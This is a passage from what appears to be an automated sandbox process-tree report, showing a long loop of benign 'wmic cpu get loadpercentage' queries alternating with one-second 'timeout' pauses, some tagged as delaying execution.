    PID:1936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3280
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2708
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1216
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4688
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4788
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1828
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1684
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2812
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2872
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4740
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2552
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3160
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:760
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2064
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:32
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:240
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1672
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1500
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2780
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:776
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3820
- C:\Windows\system32\cmd.exe
